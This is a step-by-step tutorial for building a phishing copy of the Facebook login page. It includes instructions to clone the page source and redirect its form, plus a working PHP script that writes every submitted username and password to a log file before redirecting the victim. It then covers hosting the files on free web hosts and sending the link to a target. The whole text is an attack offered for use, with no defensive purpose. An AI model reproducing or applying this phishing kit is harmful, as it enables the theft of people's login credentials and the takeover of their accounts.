1) Creating exact copy of the login page of site: Open that site in your bowser ,rightclick any where in free space and then click on view source.

2) Copy the entire source to notepad.
3)Editing source code :
Press“Ctrl+a” then “ctrl+f” (select all+find ) , then a dialogue box will appear , type “action”(without quotes) and press enter.
The word action will be highlighted in the notepad.You will then be having a line saying:
**action=”http://www.facebook.com/login.php?login_attempt=1″**

4)Change this with **action=”post.php”**(double quotes are necessary),and save
it as index.html.

2.5)Creating a Phisng script :
<?php
header ('Location: http://www.myhost.com/errorpage.html');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) 
{
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
copy the code to notepad and change
**’Location:http://www.myhost.com/errorpage.html’**
with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
and save it as “post.php”.

6) Create a log file: It is a file which contains all usernames and passwords . Open
notepad and save it as **usernames.txt**.

7) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
Phpnet.us
bytehost.org
freehostia.org

Create account on any of these sites for free hosting plan.

8)After creating account just upload the three files to your web hosting account.

9)You are ready for the attack.Just send the link of your index.html to the victim.
If he opens and tries to login , id and password will be saved in the usernames.txt file.